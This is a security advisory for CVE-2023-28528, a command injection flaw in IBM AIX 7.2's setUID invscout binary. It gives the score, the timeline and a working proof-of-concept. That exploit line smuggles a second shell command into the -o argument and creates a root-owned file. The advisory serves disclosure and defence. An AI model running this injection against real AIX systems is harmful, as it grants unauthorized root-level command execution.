CVE-2023-28528
An OS command injection vulnerability exists in the invscout setUID binary functionality of IBM Corporation AIX 7.2. A specially-crafted command line argument can lead to execute privileged operation. An attacker can use arbitrary code execution to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
IBM Corporation AIX 7.2
AIX - http://us.ibm.com
5.5 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
AIX is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms.
The invscout setUID binary has an undocumented parameter that can be used to request the installation of an arbitrary RPM. Furthermore, the mechanism by which the RPM is installed requires the supplied value to be concatenated into a string that is then passed into system().
The most trivial method of exploitatation to gain command execution takes the following form:
$ invscout -RPM ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm -o "-i ../../../../../$HOME/info-6.7-1.aix5.1.ppc.rpm; touch /etc/pwned; echo "
package info-6.7-1.ppc is already installed
/var/adm/invscout/microcode/../../../../..//home/tmb/info-6.7-1.aix5.1.ppc.rpm
$ ls -la /etc/pwned
-rw-rw-rw- 1 root staff 0 Dec 18 12:59 /etc/pwned
Note: The umask is set to 0 prior to exploitation commencing.
2023-01-09 - Initial Vendor Contact
2023-01-16 - Vendor Disclosure
2023-04-12 - Vendor Patch Release
2023-04-24 - Public Release
Discovered by Tim Brown of Cisco Security Advisory EMEAR.